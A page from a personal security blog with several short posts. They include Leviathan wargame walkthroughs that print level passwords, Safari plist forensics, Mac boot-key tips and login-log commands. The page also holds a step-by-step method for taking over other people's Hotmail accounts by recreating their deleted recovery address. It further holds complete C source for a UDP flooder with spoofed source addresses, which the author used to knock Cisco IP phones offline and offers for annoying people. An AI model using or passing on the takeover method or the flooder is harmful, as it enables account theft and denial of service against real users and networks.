Posts tagged Security

« Hacking » Friends Hotmail’s Accounts

0
66 jours
by in Security, Web

There are a few existing ways of hacking an hotmail account, such as brute-force, or the secrete answer/question, but today I(and friends) found another « way » of doing it (that I never heard before)

Long story short :

To make it work, the hacker needs to know the « save » e-mail address, and hope, this address has been deleted.

When you forgot your password it is possible to ask hotmail to « Email me a reset link« , when clicking on this link hotmail  shows the user the e-mail address to which it is going to send the reset link, for example :

my*****@hotmail.com

But in a few cases, this e-mail address might have been already deleted by hotmail (if you didn’t used it anymore, or if the target didn’t used it anymore), to verify that fact, the hacker can simply  return to the following link:

« Can’t access your account » (on the sign-in page)

From there the hacker can tick the  « I forgot my password » radio buttonfollowing the link the hacker will find the page displayed below :
And here comes the trick :

IF the address does not exist anymore, the hacker will receive the following message :


If hotmail returns the following message the trick is to « recreate » this e-mail such as creating a new account, and then restore the password from the account you wanted to get the password back at first.

 

And that’s it, hotmail will not verify that the previous e-mail had been deleted or not, it will simply send you the restore password link.

 

Have fun.

Forensic Bookmark.plist from Safari

0
556 jours
by in mac, OS, Security

I was reading some documents on Mac Os X forensic, and I was searching
how to get back the Bookmark.plist from safari to parse it and read it easily …

I knew that this file is located in the following folder :

~Library/Safary/Bookmarks.plist

I was thinking that plist files where always XML documents and tried with python to read the file, I opened python and typed the following commands.

>>>  import plistlib
>>> plist.readPlist('Bookmarks.plist)

Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/plistlib.py", line 78, in readPlist
rootObject = p.parse(pathOrFile)
File "/System/Library/Frameworks/Python.framework/Versions/2.6/lib/python2.6/plistlib.py", line 405, in parse
parser.ParseFile(fileobj)
xml.parsers.expat.ExpatError: not well-formed (invalid token): line 1, column 9

Yeah ! Error …

I got back to my shell and tried to read it with

$ cat Bookmarsk.plist

[...] it was not an XML output at all !

I directly decide to go to  developer.apple.com/ , to find the plist use, and find out that some plist files are in

BINARY FORMAT PROPERTY LISTS

WTF ??

hopefully the command was given to translate it to XML

plutil -convert xml1 -o - Bookmarks.plist

I tried it, and it gave me a cool XML format.

I could then put the output of this command in an XML file and use it.

Intruded Nº4

0
618 jours
by in Linux, OS, Security

For the 4th one, we remeber that there was a program called
« level4″ in the /wargame folder, let’s go to it.

first run :

level4@leviathan:/wargame$ ./level4
Enter the password> lol
bzzzzzzzzap. WRONG
level4@leviathan:/wargame$

interesting .. it looks like the 2 challenge, let’s disassemble the main part : 

(gdb) disassemble main
Dump of assembler code for function main:
0x08048523 :	lea    0x4(%esp),%ecx
0x08048527 :	and    $0xfffffff0,%esp
0x0804852a :	pushl  0xfffffffc(%ecx)
0x0804852d :	push   %ebp
0x0804852e :	mov    %esp,%ebp
0x08048530 :	push   %ecx
0x08048531 :	sub    $0x44,%esp
0x08048534 :	mov    0x8048757,%eax
0x08048539 :	mov    %eax,0xfffffff1(%ebp)
0x0804853c :	movzwl 0x804875b,%eax
0x08048543 :	mov    %ax,0xfffffff5(%ebp)
0x08048547 :	movzbl 0x804875d,%eax
0x0804854e :	mov    %al,0xfffffff7(%ebp)
0x08048551 :	mov    0x804875e,%eax
0x08048556 :	mov    %eax,0xffffffe7(%ebp)
0x08048559 :	mov    0x8048762,%eax
0x0804855e :	mov    %eax,0xffffffeb(%ebp)
0x08048561 :	movzwl 0x8048766,%eax
0x08048568 :	mov    %ax,0xffffffef(%ebp)
0x0804856c :	mov    0x8048768,%eax
0x08048571 :	mov    %eax,0xffffffe0(%ebp)
0x08048574 :	movzwl 0x804876c,%eax
0x0804857b :	mov    %ax,0xffffffe4(%ebp)
0x0804857f :	movzbl 0x804876e,%eax
0x08048586 :	mov    %al,0xffffffe6(%ebp)
0x08048589 :	mov    0x804876f,%eax
0x0804858e :	mov    %eax,0xffffffd9(%ebp)
0x08048591 :	movzwl 0x8048773,%eax
0x08048598 :	mov    %ax,0xffffffdd(%ebp)
0x0804859c :	movzbl 0x8048775,%eax
0x080485a3 :	mov    %al,0xffffffdf(%ebp)
0x080485a6 :	mov    0x8048776,%eax
0x080485ab :	mov    %eax,0xffffffcf(%ebp)
0x080485ae :	mov    0x804877a,%eax
0x080485b3 :	mov    %eax,0xffffffd3(%ebp)
0x080485b6 :	movzwl 0x804877e,%eax
0x080485bd :	mov    %ax,0xffffffd7(%ebp)
0x080485c1 :	lea    0xffffffd9(%ebp),%eax
0x080485c4 :	mov    %eax,0x4(%esp)
0x080485c8 :	lea    0xffffffe0(%ebp),%eax
0x080485cb :	mov    %eax,(%esp)
0x080485ce :	call   0x804835c 
0x080485d3 :	test   %eax,%eax
0x080485d5 :	jne    0x80485de 
0x080485d7 :	movl   $0x1,0xfffffff8(%ebp)
0x080485de :	movl   $0x8048742,(%esp)
0x080485e5 :	call   0x80483bc

0x080485ea :	call   0x8048484 
0x080485ef :	add    $0x44,%esp
0x080485f2 :	pop    %ecx
0x080485f3 :	pop    %ebp
0x080485f4 :	lea    0xfffffffc(%ecx),%esp
0x080485f7 :	ret
---Type  to continue, or q  to quit---q
Quit

Again, we can take the interesting part :

0x080485ce :	call   0x804835c 
0x080485d3 :	test   %eax,%eax
0x080485d5 :	jne    0x80485de

let’s make a break point on it, and run it until it ask the password : 

reakpoint 1 at 0x804835c
(gdb) r
Starting program: /wargame/level4 

Breakpoint 1, 0x0804835c in strcmp@plt ()
(gdb) s
Single stepping until exit from function strcmp@plt,
which has no line number information.
0xb7f1eec0 in strcmp () from /lib/tls/i686/cmov/libc.so.6
(gdb) s
Single stepping until exit from function strcmp,
which has no line number information.
0x080485d3 in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
Enter the password> test

/!\ there is an interesting thing, I had to push 3 times « s » to arrive to my break point
( I should analyse this, anyway let’s continue ) /!\

let’s see what’s happening when we analyse $esp 

(gdb) x/2x $esp
0xbffff8bc:	0x080484e6	0xbffff8dd
(gdb) x/s 0xbffff8dd
0xbffff8dd:	 "test\n"

Ok, we got our password back, so, let’s go a bit further

(gdb) x/3x $esp
0xbffff8bc: 0x080484e6 0xbffff8dd 0xbffff9dd
(gdb) x/s 0xbffff9dd
0xbffff9dd: « snlprintf\n »
(gdb)

ok .. here there is a little trick "snlprintf" is the password we are searching for,
they just put a " C " name as string. the clue is "\n" at the end of snlprintf ;)

let's try the password :

level4@leviathan:/wargame$ ./level4
Enter the password> snlprintf
[You've got shell]!
sh-3.1$

yeah let's go to the next lvl ;)

Intruded Nº3

0
619 jours
by in Linux, OS, Security

Hi,

ready for the challenge number 3 ?

let’s connect to it 


ssh level3@leviathan.intruded.net -p 10101
*************************************************
*    Welcome to Intruded.net Wargame Server     *
*                                               *
*       * You are playing "Leviathan"           *
*       * Most levels can be found in /wargame  *
*       * Login: level1:leviathan               *
*       * Support: irc.intruded.net #wargames   *
*                                               *
*                                               *
*       ! Server is restarted every 12 hours    *
*       ! Server is cleaned every reboot        *
*       ! /tmp direcotry is writable            *
*                                               *
*                                               *
*************************************************
level3@leviathan.intruded.net's password:
Linux leviathan 2.6.18-6-686 #1 SMP Thu Aug 20 21:56:59 UTC 2009 i686

level3@leviathan:~$

Let’s directly go to the Wargame folder 

level3@leviathan:~$ cd /wargame/
level3@leviathan:/wargame$ ls
check  level4  printfile  prog  sphinx

let’s try one by one the programs, to see what’s our.

level3@leviathan:/wargame$ ls
check  level4  printfile  prog  sphinx
level3@leviathan:/wargame$ ./level4
-bash: ./level4: Permission denied
level3@leviathan:/wargame$ ./printfile
-bash: ./printfile: Permission denied
level3@leviathan:/wargame$ ./sphinx
-bash: ./sphinx: Permission denied
level3@leviathan:/wargame$ ./prog
Cannot find /tmp/file.log
level3@leviathan:/wargame$

It looks like we have to use ./prog

we have to read /home/level4/.passwd …
and ./prog is reading the file /tmp/file.log and printing the content … so let’s link both 

level3@leviathan:/wargame$ ln -s /home/level4/.passwd /tmp/file.log
level3@leviathan:/wargame$ ./prog
R0gBtSP5
level3@leviathan:/wargame$

Yeah … got it !!

ok, next challenges tomorrow :)

Intruded nº2

0
619 jours
by in Linux, OS, Security

Now that we succeeded the first level, let’s go for the second one.

Once connected to the second level you get this :

ssh level2@leviathan.intruded.net -p 10101
*************************************************
*    Welcome to Intruded.net Wargame Server     *
*                                               *
*       * You are playing "Leviathan"           *
*       * Most levels can be found in /wargame  *
*       * Login: level1:leviathan               *
*       * Support: irc.intruded.net #wargames   *
*                                               *
*                                               *
*       ! Server is restarted every 12 hours    *
*       ! Server is cleaned every reboot        *
*       ! /tmp direcotry is writable            *
*                                               *
*                                               *
*************************************************
level2@leviathan.intruded.net's password:
Permission denied, please try again.
level2@leviathan.intruded.net's password:
Linux leviathan 2.6.18-6-686 #1 SMP Thu Aug 20 21:56:59 UTC 2009 i686
level2@leviathan:~$

let’s see what files are available :

level2@leviathan:~$ ls -a
.  ..  .bash_history  .bash_logout  .bash_profile  .bashrc  .passwd
level2@leviathan:~$

Hmm nothing interesting let’s get one folder above,

level2@leviathan:/home$ ls -a
.  ..  level1  level2  level3  level4  level5  level6  level7  level8
level2@leviathan:/home$ cd level3/
-bash: cd: level3/: Permission denied
level2@leviathan:/home$

Hmm we cannot go to the level3 … let’s get to one folder above again

level2@leviathan:/$ ls -a
.    boot   etc     initrd.img  media  proc  srv  usr      wargame
..   cdrom  home    lib         mnt    root  sys  var
bin  dev    initrd  lost+found  opt    sbin  tmp  vmlinuz
level2@leviathan:/$

Haaa , there is a wargame folder, let’s try this one

level2@leviathan:/wargame$ ls
check  level4  printfile  prog  sphinx
level2@leviathan:/wargame$

ok, let’s try the first program :

level2@leviathan:/wargame$ ./check
password: test
Wrong password, Good Bye ...
level2@leviathan:/wargame$

Hmmm it looks like it’s a strcmp in C … if you remember I wrote an article about that,
how to get a password with GDB ( here )

let’s try it here :

 level2@leviathan:/wargame$ gdb  ./check
GNU gdb 6.4.90-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

Let’s disassemble the main function :

(gdb) disassemble main
Dump of assembler code for function main:
0x08048464 :	lea    0x4(%esp),%ecx
0x08048468 :	and    $0xfffffff0,%esp
0x0804846b :	pushl  0xfffffffc(%ecx)
0x0804846e :	push   %ebp
0x0804846f :	mov    %esp,%ebp
0x08048471 :	push   %ecx
0x08048472 :	sub    $0x34,%esp
0x08048475 :	mov    0x8048668,%eax
0x0804847a :	mov    %eax,0xfffffff3(%ebp)
0x0804847d :	mov    0x804866c,%eax
0x08048482 :	mov    %eax,0xffffffec(%ebp)
0x08048485 :	movzwl 0x8048670,%eax
0x0804848c :	mov    %ax,0xfffffff0(%ebp)
0x08048490 :	movzbl 0x8048672,%eax
0x08048497 :	mov    %al,0xfffffff2(%ebp)
0x0804849a :	mov    0x8048673,%eax
0x0804849f :	mov    %eax,0xffffffe8(%ebp)
0x080484a2 :	mov    0x8048677,%eax
0x080484a7 :	mov    %eax,0xffffffe3(%ebp)
0x080484aa :	movzbl 0x804867b,%eax
0x080484b1 :	mov    %al,0xffffffe7(%ebp)
0x080484b4 :	movl   $0x8048638,(%esp)
0x080484bb :	call   0x8048398

0x080484c0 :	call   0x8048338
0x080484c5 :	mov    %al,0xfffffff7(%ebp)
0x080484c8 :	call   0x8048338
0x080484cd :	mov    %al,0xfffffff8(%ebp)
0x080484d0 :	call   0x8048338
0x080484d5 :	mov    %al,0xfffffff9(%ebp)
0x080484d8 :	movb   $0x0,0xfffffffa(%ebp)
0x080484dc :	lea    0xfffffff3(%ebp),%eax
0x080484df :	mov    %eax,0x4(%esp)
0x080484e3 :	lea    0xfffffff7(%ebp),%eax
0x080484e6 :	mov    %eax,(%esp)
0x080484e9 :	call   0x8048348
0x080484ee :	test   %eax,%eax
0x080484f0 :	jne    0x804850c
0x080484f2 :	movl   $0x3ea,(%esp)
0x080484f9 :	call   0x8048358
0x080484fe :	movl   $0x8048643,(%esp)
0x08048505 :	call   0x8048368
0x0804850a :	jmp    0x8048518
0x0804850c :	movl   $0x804864b,(%esp)
0x08048513 :	call   0x8048378

0x08048518 :	add    $0x34,%esp
0x0804851b :	pop    %ecx
0x0804851c :	pop    %ebp
0x0804851d :	lea    0xfffffffc(%ecx),%esp
0x08048520 :	ret
0x08048521 :	nop
0x08048522 :	nop
0x08048523 :	nop
0x08048524 :	nop
0x08048525 :	nop
0x08048526 :	nop
0x08048527 :	nop
0x08048528 :	nop
0x08048529 :	nop
0x0804852a :	nop
0x0804852b :	nop
0x0804852c :	nop
0x0804852d :	nop
0x0804852e :	nop
0x0804852f :	nop
End of assembler dump.

as we can see :

0x080484e9 :	call   0x8048348
0x080484ee :	test   %eax,%eax
0x080484f0 :	jne    0x804850c

this is the interesting part, let’s make a break point on the call and analyse it with x/x

(gdb) b * 0x8048348
Breakpoint 1 at 0x8048348
(gdb) r
Starting program: /wargame/check
password: test

Breakpoint 1, 0x08048348 in strcmp@plt ()
(gdb) x/x $esp
0xbffff9fc:	0x080484ee

as we can see it’s giving us, what is on this moment in the stack, let’s go further,
we are gonna print the stack with x/s and see what happens.

(gdb) x/s 0x080484ee
0x80484ee :	 "\205?u\032?\004$?\003"

it looks not normal let’s try a bit more

(gdb) x/2x $esp
0xbffff9fc:	0x080484ee	0xbffffa2f
(gdb) x/s 0xbffffa2f
0xbffffa2f:	 "tes"

Haaa this is OUR « tes » we can already conclude that the password is only 3 chars, let’s get more inside it
again

(gdb) x/3x $esp
0xbffff9fc:	0x080484ee	0xbffffa2f	0xbffffa2b
(gdb) x/s 0xbffffa2b
0xbffffa2b:	 "sex"
(gdb)

Got it …

let’s run again, tadaaa new shell

level2@leviathan:/wargame$ ./check
password: sex
sh-3.1$

anyway another solution could have been to use the ltrace command:

level2@leviathan:/wargame$ ltrace ./check
__libc_start_main(0x8048464, 1, 0xbffffad4, 0x8048580, 0x8048530
printf("password: ")                                                                                                         = 10
getchar(0x8048638, 0xb7fe0ff4, 0xbffffa28, 0x80483f0, 0xb7fe0ff4password: test
)                                                            = 116
getchar(0x8048638, 0xb7fe0ff4, 0xbffffa28, 0x80483f0, 0xb7fe0ff4)                                                            = 101
getchar(0x8048638, 0xb7fe0ff4, 0xbffffa28, 0x80483f0, 0xb7fe0ff4)                                                            = 115
strcmp("tes", "sex")                                                                                                         = 1
puts("Wrong password, Good Bye ..."Wrong password, Good Bye ...
)                                                                                         = 29
+++ exited (status 29) +++
level2@leviathan:/wargame$

let’s go to the next level ;) 

sh-3.1$ cat /home/level3/.passwd
oc7vaCOg
sh-3.1$

Intruded nº1

0
619 jours
by in Linux, OS, Security

Today I tried the Intruded Leviathan wargame ( the first levels ),

I will explain how to resolve them easily.

Let’s try the first one.

  1. open a terminal
  2. type « ssh level1@leviathan.intruded.net -p 10101″
  3. type the password  leviathan

and then you should get something like this :

*************************************************
*    Welcome to Intruded.net Wargame Server     *
*                                               *
*       * You are playing "Leviathan"           *
*       * Most levels can be found in /wargame  *
*       * Login: level1:leviathan               *
*       * Support: irc.intruded.net #wargames   *
*                                               *
*                                               *
*       ! Server is restarted every 12 hours    *
*       ! Server is cleaned every reboot        *
*       ! /tmp direcotry is writable            *
*                                               *
*                                               *
*************************************************
level1@leviathan.intruded.net's password:
Linux leviathan 2.6.18-6-686 #1 SMP Thu Aug 20 21:56:59 UTC 2009 i686

Now that we are connected, we should try the first command to see

ls -a = to list the folders even the hidden one

level1@leviathan:~$ ls -a
.  ..  .backup  .bash_history  .bash_logout  .bash_profile  .bashrc  .passwd

Hmmm there is a « backup » folder hidden, let’s enter in it, and list it.

level1@leviathan:~$ cd ./.backup
level1@leviathan:~/.backup$ ls -a
bookmarks.html

Ok, bookmarks let’s see if there are some « passwords »

level1@leviathan:~/.backup$ cat ./bookmarks.html |grep pass
<DT><A HREF="http://nahtaivel.intruded.net/passwordus.html" TEMP: "AFeSdWEf"ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to level2</A>
level1@leviathan:~/.backup$

Easy … we got it

let’s meet at the next level :)

UDP Flooder in C

0
737 jours
by in Linux, Networking, OS, Security

Yesterday we where still working on some attacks on our  bench test  and we tried some exploit on the phones
that we found on the internet. Most of them where making some DDOS on the phone but they also blocked them
this means that when people will try to phone … they will discover the phone freezing … then i made up with my
friend some modifications on some code that I had from a few years ago in C a UDP flooder.

This is sending UDP on random ports to a specific address with a random source  … and only working on linux.
the code help us to stop the connection between the 2 phones.
The one is trying to reach the other one … but the other one is too busy to answer all the « pings » and send them
to random addresses that he cannot answer.

We also discovered that when the connection between the 2 phones is established the phone
is not affected.

here his the code.

#include <stdio.h> // printf/fprintf
#include <stdlib.h>
#include <string.h> 

#include <netinet/ip.h> // struct ip
#include <sys/socket.h> // socket()
#include <netinet/in.h> // struct sockadd

#define __FAVOR_BSD
#define _USE_BSD
#include <netinet/udp.h> // struct udp

#define PADDING_SIZE 1
#define N_LOOP 10
#define U_WAITING 100000 

void udp(char *);
unsigned short int in_chksum (unsigned short int *, int);
unsigned long hasard(unsigned long, unsigned long);

main() {
srand(time(NULL));
int i;

for(i=0;i<N_LOOP;i++)
 {
 udp("xxx.xxx.xxx.xxx");
 usleep(U_WAITING);
 printf("-");    
 udp("xxx.xxx.xxx.xxx");
 usleep(U_WAITING);
 printf("+");
 }
}

void udp(char *cible) {

int sd;
sd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sd == -1) {
fprintf(stderr,"socket() error, root ?\n");
}

unsigned long ip_src = hasard(4294967295/2,4294967295);
unsigned long ip_dst = inet_addr(cible);
unsigned short p_src = (unsigned short) hasard(0,65535);
unsigned short p_dst = (unsigned short) hasard(0,65535);

struct sockaddr_in sin;

sin.sin_family = AF_INET;
sin.sin_port = p_dst;
sin.sin_addr.s_addr = ip_dst; // dst

struct ip *ip;
struct udphdr *udp;
char *dgm, *data;

int pksize = sizeof(struct ip) + sizeof(struct udphdr) + PADDING_SIZE;
dgm = (char *) malloc(pksize);
ip = (struct ip *) dgm;
udp = (struct udphdr *) (dgm + sizeof(struct ip));
data = (char *) (dgm + sizeof(struct ip) + sizeof(struct udphdr));

memset(dgm, 0, pksize);
memcpy((char *) data, "G", PADDING_SIZE);

int un = 1;
if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, (char *)&un, sizeof(un)) == -1)
 {
 fprintf(stderr,"setsockopt()");
 exit(-1);
 }

//entete ip

ip->ip_v = 4;
ip->ip_hl = 5;
ip->ip_tos = 0;
ip->ip_len = sizeof(pksize);
ip->ip_ttl = 255;
ip->ip_off = 0;
ip->ip_id = sizeof( 45 );
ip->ip_p = IPPROTO_UDP;
ip->ip_sum = 0; // a remplir aprés
ip->ip_src.s_addr = ip_src;
ip->ip_dst.s_addr = ip_dst;

//entete udp

udp->uh_sport = p_src;
udp->uh_dport = p_dst;
udp->uh_ulen = htons(sizeof(struct udphdr ) + PADDING_SIZE);
udp->uh_sum = 0;

// envoi
if (sendto(sd, dgm, pksize, 0, (struct sockaddr *) &sin,
 sizeof(struct sockaddr)) == -1) {
 fprintf(stderr,"oops, sendto() error\n");
 }

//libere la memoire
free(dgm);
close(sd);
}

u_short in_chksum (u_short *addr, int len) // taken from papasmurf.c
{
 register int nleft = len;
 register u_short *w = addr;
 register int sum = 0;
 u_short answer = 0;

 while (nleft > 1)
 {
 sum += *w++;
 nleft -= 2;
 }

 if (nleft == 1)
 {
 *(u_char *)(&answer) = *(u_char *)w;
 sum += answer;
 }

 sum = (sum >> 16) + (sum + 0xffff);
 sum += (sum >> 16);
 answer = ~sum;
 return(answer);
}

unsigned long hasard(unsigned long min, unsigned long max){
return (u_long) (min + ((float) rand() / RAND_MAX * (max - min + 1)));
}

this is quiet good working to border people without affecting the phone.
you can easily compile it with the following command :

gcc -o udp udp.c

and run it with

./udp

if everything is working you should see

+-+-+-

this is appearing during the running time.

we tested it on 7940 phones from cisco and it was good working … soon we will publish some new code.

Have fun.

Who’s connected ?

0
754 jours
by in Linux, mac, Networking, OS, Security

hep,
today let’s talk about connections and to see how we can discover if other people are connected on the machine

Commands :

who : show the connected users : Linux/Mac
last : show last connexion (passed ) : Linux / Mac
lastb : show last connexion (failed) : Linux
Files

/etc/passwd : local users
/etc/group : local groups
/etc/log/wtmp : binary file with all connexion log ( Only Linux )
/var/log/utmp : binray file with all user actually connected ( Only Linux)
/var/log/btmp : Binary file with all failed connexion ( Only Linux )

Mac Boot keys

0
765 jours
by in mac, OS, Security


Today i wanted to update a mac book with the dvd of snow leopard
and i didn’t remembered that i had to use a key to boot from the
DVD.

so i’ll make a little resume of the key’s you can use at the boot
of your macbook.

alt

This one is use if you want to boot from another hard drive
or from your bootcamp partition

it will show you two (or more ) hard drives and you can choose the one you want.

c – key

This one is used if you want to boot from a cd ( linux , windows , mac , bsd ) something
who’s bootable !

apple(cmd) + v

those one’s are used to show the verbose mode when you have some bugs with something
after the verbose you get back on the aqua GUI.

apple(cmd) + s

those are used for the « last chance «   after the « verbose » you get a shell
and you’r root directly on it !

to get back to the aqua mode just use  « exit »

weak :  just use adduser and passwd to change the password of the root !

d-key

This key is used to boot on the first partition of your hard drive
( not very usefull )

t-key

T key is used on the new computers to use your mac as an external hard drive with firewire
this is for the new mac.

6 4 – keys

those one’s can be used to boot in 64 bits with  snow leopard.
you can also change it in some configuration files to make it automatic.

this was they key boot resume ;)

Get Adobe Flash playerPlugin by wpburn.com wordpress themes
Go to Top